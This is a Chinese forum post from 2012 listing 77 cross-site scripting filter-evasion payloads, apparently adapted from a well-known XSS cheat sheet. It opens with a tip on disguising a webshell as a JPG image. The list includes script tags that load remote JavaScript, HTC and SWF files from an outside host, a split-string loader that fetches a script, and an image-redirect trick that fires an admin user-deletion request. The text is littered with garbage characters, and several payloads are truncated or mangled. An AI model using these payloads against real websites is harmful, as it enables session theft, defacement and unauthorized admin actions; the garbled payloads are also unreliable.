跨站图片shell# ^7 m( A, [& V6 k: F
XSS跨站代码 <script>alert("")</script>" c M/ h) N0 i" S7 t9 y
% l- X( ~6 j$ ~6 m: }* i3 C
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马' V3 \0 K5 {5 k9 a* R, ?% N! f
4 I' {3 }7 R5 r
! G. e h) Y$ N4 n
3 ?) O$ k. _' D" z; I1)普通的XSS JavaScript注入 T8 B, |! Z1 S1 ?9 }1 ^! l
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* ^1 X$ C: e6 j9 Z2 F5 j' p) P
$ q& l O, P) C(2)IMG标签XSS使用JavaScript命令: {5 T3 i6 ~" k
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" B6 r; \6 i9 L& I( o" [
3 m9 G1 X: o8 B1 N(3)IMG标签无分号无引号+ {5 e$ A/ e8 m8 I5 I
<IMG SRC=javascript:alert(‘XSS’)>
4 b; |% D y F! o
$ U8 |1 _" _' I% D8 W0 l5 p/ `9 ~9 S. i(4)IMG标签大小写不敏感" C7 p# L$ D7 i: b
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
$ Q' _3 S' c6 n9 r/ q4 n
" ^ j) e ~) `$ g' b(5)HTML编码(必须有分号)# T+ E, n+ b% o* X% ]9 w) X
<IMG SRC=javascript:alert(“XSS”)>
|. Y( @: E4 ]5 M4 e. K6 s: w7 ]& C. ?
(6)修正缺陷IMG标签! k3 A$ t9 T, u* `! h5 Z1 _
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>8 i. r! P2 \5 Z8 v4 m
$ \( N" W0 w9 n9 X# x- _+ i0 z! u(7)formCharCode标签(计算器)8 _% n6 S% o/ c* }: F5 N
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>0 Q' R- \: A: [7 [
+ [+ d; F. w8 o0 @
(8)UTF-8的Unicode编码(计算器): N! s4 p: c5 A5 n
<IMG SRC=jav..省略..S')>
3 V9 ~# c# q- [5 |: W2 v: B" t P6 r7 K
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)$ ^! X8 }7 [: ]9 o$ I+ M- {- g
<IMG SRC=jav..省略..S')># }' u+ {. b- W, G7 s- }3 I! X
- J) p6 b; E" R3 E' Z; d2 {(10)十六进制编码也是没有分号(计算器)
* m# i1 b: u" X$ L<IMG SRC=java..省略..XSS')>* e7 S$ B% M3 q9 _ A* y6 d
" R. q( G: g8 ]. m(11)嵌入式标签,将Javascript分开
3 [- U5 Q2 q! a8 ]1 H7 P<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 t4 C+ A0 k0 b4 l
- R3 |: S! U7 V7 J# O! x9 h(12)嵌入式编码标签,将Javascript分开
\1 q% x c) t<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 H+ [; V2 [' S% O+ p" V! P& A( k* F
(13)嵌入式换行符; ?' e. C* C: ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 z* F+ ], y, \' v, g' K, [) Z
1 b) `4 N0 ^1 @5 `8 D2 e
(14)嵌入式回车
+ [) l8 o2 C9 X5 _& ]<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 F. g5 c- w/ Y1 `9 G
. n- F2 H e& v2 a(15)嵌入式多行注入JavaScript,这是XSS极端的例子
* E7 O' A6 n4 H) j" {, w<IMG SRC=”javascript:alert(‘XSS‘)”>
3 `5 }% q- G1 Q7 m$ g7 d5 v7 S% P8 e- g M6 y8 i }
(16)解决限制字符(要求同页面)( ~2 Z# [7 i! Q
<script>z=’document.’</script>
9 r. {- ?/ n' P<script>z=z+’write(“‘</script>
$ O2 c# H" V/ v# g# ~0 ^, z. i<script>z=z+’<script’</script>" G0 Z! D7 n+ W$ b5 y( s
<script>z=z+’ src=ht’</script>
4 f" V$ C& ?$ j6 \% J: x. ?<script>z=z+’tp://ww’</script>: P. r6 j$ O5 s" t4 C3 \
<script>z=z+’w.shell’</script>
4 Y* r$ D- V' Q1 t. Q, b6 e<script>z=z+’.net/1.’</script>
( M4 z, E/ b6 S1 ^: R7 q<script>z=z+’js></sc’</script>9 H7 c% @5 K5 k2 t( @% Z
<script>z=z+’ript>”)’</script>
& I% i$ p4 g/ S) C0 N j K<script>eval_r(z)</script>
9 Q" R# q/ Q9 ~, P6 m
2 b/ f! w) Z' D9 o4 G1 @) V(17)空字符' f8 V: B: h: y
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 \: F3 {" X: x( P) e# p; n3 O1 ]: v g d f
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 }! s# D( ^2 ^; ]; S
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out( A! P; s9 ], U& ~' o* R
5 H$ f: |2 P6 Q9 c9 F. ~: c K
(19)Spaces和meta前的IMG标签
& a, x6 s8 ^" N& ^* X# s, _<IMG SRC=” javascript:alert(‘XSS’);”># ~- e9 A+ k$ L3 }; a/ L5 T
- ^6 M: C+ B, t3 u7 T(20)Non-alpha-non-digit XSS
7 j* S0 x1 Q7 l, \& o( `( `<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 g- ?; z1 x1 P/ `' E% Z
+ z3 m1 { U9 s. ]4 g9 {* J' y; a0 O(21)Non-alpha-non-digit XSS to 2
. \3 t! p6 z' W5 h9 `<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
5 m( T' p. R5 f o
" \, A- [. `2 K* K: u ]% f. R(22)Non-alpha-non-digit XSS to 3
- L/ t! r9 D% W7 h9 `2 h<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT> o) s, `! q8 R5 I C% S9 b
+ H: |9 ]) A* l& ?4 k1 K8 y(23)双开括号& S" X# `8 I2 [" k& \3 z1 ~
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
) `! @& v) J6 p6 H% {. [1 f) |" g X) x9 W$ {3 A
(24)无结束脚本标记(仅火狐等浏览器)/ R0 i/ v. r) y1 Y$ u
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
; z0 D4 x5 ?4 m+ ?; ?; J: d$ B) r' ], S1 z: T5 n. v
(25)无结束脚本标记2# S" f1 L4 W" ]8 l* i% w
<SCRIPT SRC=//3w.org/XSS/xss.js>) Q! }0 H0 ?+ H- _" V) v& g
/ c; [& U) t7 v7 J(26)半开的HTML/JavaScript XSS! U: v! _1 ^ b# E3 }
<IMG SRC=”javascript:alert(‘XSS’)”. m4 x% ~, i2 {+ i
/ \. j# m+ g/ c5 W6 S(27)双开角括号
) F! F: b. H' k- j5 x<iframe src=http://3w.org/XSS.html <
, }0 ?! W; H: \$ g0 P$ Y+ e
- @; I' [( u3 o(28)无单引号 双引号 分号
- t0 Z2 u) ^! ?: I1 Y) y<SCRIPT>a=/XSS/2 f7 F3 J- k: d& \: a6 ^( z
alert(a.source)</SCRIPT>
* u! y2 ?, Z: h/ X/ @7 l% q: `! w2 l; _: g( [
(29)换码过滤的JavaScript
6 L3 }) Q6 ^# U' S) |8 R) Z\”;alert(‘XSS’);//3 P, }4 ?/ @, S
8 v5 u7 E: Y- X5 [+ @& C8 U, `
(30)结束Title标签# l$ H) P: B3 \8 A: {& w
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
! Z! d: d+ m$ n1 v) l5 }1 g! [- {/ ?$ ^) ?* G. Z# B, x6 q$ O
(31)Input Image
5 i9 e) [% G) N# P9 z7 @3 L0 s<INPUT SRC=”javascript:alert(‘XSS’);”>$ t4 }6 p- @& M' O7 n! S/ `; [
9 f) V n! l9 k
(32)BODY Image) f6 I0 A) O7 h9 H9 \4 z7 D
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>1 ]1 P" A$ ~, m% R# ^$ X3 ~2 @5 j
% e; o3 A. ^4 o& H* P/ m
(33)BODY标签
4 |+ j9 D3 e4 D/ {8 H<BODY(‘XSS’)>. _9 v) k5 K+ ?" C5 z( N
' P- I5 |- n1 H
(34)IMG Dynsrc
( q ^% M& F2 P! n& n<IMG DYNSRC=”javascript:alert(‘XSS’)”>
, q* H$ f; k- ~# f% T: ^+ P! n: N1 g0 z( h7 T/ u- t' j# t
(35)IMG Lowsrc2 B+ t' c$ O" x" x0 Q' ~
<IMG LOWSRC=”javascript:alert(‘XSS’)”>! ]6 V3 k( {' F: c* D
: o5 W# N# W( B6 }8 t; O! p9 i* U
(36)BGSOUND, O+ |) V$ M1 o- F, b( H f+ a
<BGSOUND SRC=”javascript:alert(‘XSS’);”>. z, g8 G. K2 a. l+ h+ [, L
7 W; T& l# Y: F( p/ M7 U( q(37)STYLE sheet% t+ z# z: F, m, G0 [8 ^9 F( p
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
5 c- [8 `4 \. [! u6 I6 R! N7 U4 r2 c
(38)远程样式表
$ S0 l! Q- T/ W4 A$ i0 a<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
1 F: K/ D7 R0 {* i8 [/ k) U
, b7 k6 }. s% |! ^9 q' p0 z% m2 g5 M(39)List-style-image(列表式)/ [+ \( A Q: V( M
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS4 ?- x1 F9 b" o7 F! C
J0 ^( U& y, p% }* q8 ?% x: z
(40)IMG VBscript
# Y+ [' O! c8 X$ w# C5 K9 d<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
+ k+ F8 v1 S6 F; J1 `" s8 B5 e7 g- V" k( j0 j8 B
(41)META链接url& i1 }& W2 j7 E% a8 G5 H( r6 ~( E
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
* M9 s; b5 q1 U" e+ V* i! b. @2 u8 O( i; n0 E* B$ H, b+ S
(42)Iframe. [! q6 Q: }; w6 e! `7 R
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
) Y3 d/ ]: P, ]+ K! ?3 g1 J(43)Frame
1 B+ R2 n6 K1 [! x6 q7 b<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>' B1 S5 I* H3 V8 @
5 v/ C* @) W4 S8 p; {6 E(44)Table
& A# v' c) p& \( Y/ n% I) G<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>& c; ^: X5 n$ |9 O9 c
5 Y8 O% x3 z. R. L# P(45)TD
) d* X0 W1 g+ V2 w<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 M. j" J4 B9 L- Q
# c6 ], S6 M. L8 z(46)DIV background-image2 O. c' S# c# m( \7 ]+ q. M
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
8 T3 |; o( h; \0 J8 W4 Y. ?, d7 U# O* Z' i) f8 v, `. |* {* X/ _: P
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
2 @" ^8 T: o& W5 h7 |<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>9 c. ]2 t, N) [/ T5 c0 |5 }) d
& ^8 i$ V4 U: e( d1 D# r0 `, X, ~(48)DIV expression8 i" `# c; j+ `$ z. b/ V7 g: _
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>! R' m( |# _! l% N9 _" ?; v3 R
# z3 ?* P+ A# Q
(49)STYLE属性分拆表达
# x, v- R. K- T: e i4 S<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
* P/ @+ ], Q4 g8 r5 O8 p: W/ { f: l( v/ x( X
(50)匿名STYLE(组成:开角号和一个字母开头)% J; E7 o2 G/ H& N2 e. c9 \
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>' ~7 [: w" b# R: U9 {6 y
& N: P8 q6 j* [! j" v* n" B
(51)STYLE background-image
& m# W* w& r1 T3 p3 T7 u<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
% ^2 F4 C7 z& V* \! Q N; D0 G( d7 Z* C+ p9 z
(52)IMG STYLE方式6 }, K& h0 ~% H& n4 Z; d
exppression(alert(“XSS”))’>
: g6 P/ Q% P# K$ J
% `& m0 m9 q* T(53)STYLE background
2 |# b4 f3 J# u& ~+ O& O* Y<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
7 @) E# i8 k. i$ K" C g
% P5 O9 t; h6 M; b(54)BASE
; K, d6 @ u" `8 C3 u: Q- \<BASE HREF=”javascript:alert(‘XSS’);//”>0 I u2 w, V! t7 e/ W
/ J5 n: a) O8 f- K9 h: F( u- t8 B" i! e(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
5 D* z; z0 y+ e" f. ]( q<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
/ Z6 B6 W8 ]" S$ A! G _' p$ d
* Q" C I0 X7 v4 T- P(56)在flash中使用ActionScrpt可以混进你XSS的代码9 p5 e% o( w6 p1 K. i' A) I% b4 I p
a=”get”;
% @, C( _# g% I8 c1 d. |' X4 s9 Nb=”URL(\”";
1 T3 Y e9 Q' G2 z' W$ Rc=”javascript:”;' ?4 n3 c- `5 Y3 P) Y2 F
d=”alert(‘XSS’);\”)”;' C- |! V; e+ ^2 Z. I5 `
eval_r(a+b+c+d);
* [5 u& @ c0 O& m ^: _6 g/ P& H4 ~1 A1 _% Q% q# X# a
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上; u6 C2 B9 z: U3 U7 B. c; U" v
<HTML xmlns:xss>4 I9 u% r% e0 I8 Z5 x/ f
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>- H' G8 u3 j3 y# o/ J8 d) N
<xss:xss>XSS</xss:xss>, [7 @: E; _1 s# M$ u, K1 ^. T4 ]
</HTML># I, i8 t: g- u: V+ d
! c( [; K, S+ L% n- O' j
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用( U9 F) y# F! G, ]/ k5 M! ?
<SCRIPT SRC=””></SCRIPT>
) [0 C' v5 B& [+ J* ?4 N+ X) o$ N: n1 O. X% i ^
(59)IMG嵌入式命令,可执行任意命令3 t- p6 k: x K; L
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
7 q- Y. \6 P7 q5 ~1 F) ]
4 ]; U7 P) n7 e5 `: O. o' D9 t(60)IMG嵌入式命令(a.jpg在同服务器)
* I" |+ z2 S3 ?Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
) b: _, B- T1 ]* B) P- [
8 Y5 G" }2 _. Q, x7 k" J; \(61)绕符号过滤
4 e: k5 L8 a" u<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>9 z: H* o) O& K( M0 r! ^
) K/ ?' y( g* ?2 f' \ F3 ]
(62)5 [, F. X a" M! y) B+ C
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>, E/ D$ W* U. c3 k# \
! ]( H( L1 ?3 I7 W1 a(63)
9 T4 w+ w% r: h1 [<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
: L1 h2 M9 r. @/ c2 F* ]" ^+ ~, o; T* r9 M! }
(64)
6 c% M3 I& v" z. F4 z: z8 [<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>+ |* _8 c- b# G: n) h) N# y- e
5 Q; C" q# F- q, `" x. I
(65)2 g1 E. B8 Z4 e
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
* {/ k- B k7 l0 j" s+ Y0 b7 @
9 t0 G% z/ t; ?2 M' v(66)
, V/ Y9 ^- K: A9 k" s- E<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 D" _1 k4 y% R
6 R0 h0 D* m7 z0 r# _% V(67), w0 n4 P9 X6 z, a1 {& X
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
0 J5 x, k0 z& ^9 x" p+ d$ ?! E+ b& _: \+ A- i
(68)URL绕行/ e, p% @8 D( Y0 W6 S$ i5 H
<A HREF=”http://127.0.0.1/”>XSS</A>
t& | S) \, ` k% f3 {: J& _3 P; ]) p
(69)URL编码4 r- V) S" _# i ~ S# O- N
<A HREF=”http://3w.org”>XSS</A>
2 d3 y3 z2 X: q; S! p: f! g
- F; [* D/ q: t1 K% J(70)IP十进制
# `/ O+ F$ X8 c" R8 p<A HREF=”http://3232235521″>XSS</A>& U: x) F! x% y/ ^* o) B. o
5 a0 ~& f F5 E. R8 S( U* i6 L(71)IP十六进制# v* H7 s/ W% Y. W& D+ _
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>/ I( t7 [ l4 U4 k) p* H' b
% |2 Z- V2 Q9 ^4 s X- l9 W(72)IP八进制
9 o* l5 x' b6 S5 {<A HREF=”http://0300.0250.0000.0001″>XSS</A>1 f* b, t8 x$ Q* f& l
, h; n8 o u8 I V& w(73)混合编码/ ~$ k, [) c/ Q
<A HREF=”h d; D. T- b7 J: T
tt p://6 6.000146.0×7.147/”">XSS</A>
3 h# n8 { @6 C) v- l* _. h4 [1 z5 N. ~4 h
(74)节省[http:]% l7 L$ M y* m
<A HREF=”//www.google.com/”>XSS</A>
. m+ O* U9 v, K1 t8 W X
@- N" v P; O8 E$ K9 p- `(75)节省[www]5 G7 F4 X; n3 ?, `- v! l+ \# u- m
<A HREF=”http://google.com/”>XSS</A>3 i q/ U2 R; q! k* @( ~' E0 {1 N
5 ? C9 u! @8 L5 O0 j5 j(76)绝对点绝对DNS
- ^8 f9 I y+ n* ~<A HREF=”http://www.google.com./”>XSS</A>1 x! M. a5 j! Q5 p5 O9 H8 M
) w+ H* J% e! K
(77)javascript链接
) b v/ W5 ~0 k- d' H% D<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
3 K# J% K+ T5 g0 I2 ~ |
发表于 2012-9-13 17:04:56
收藏
支持
反对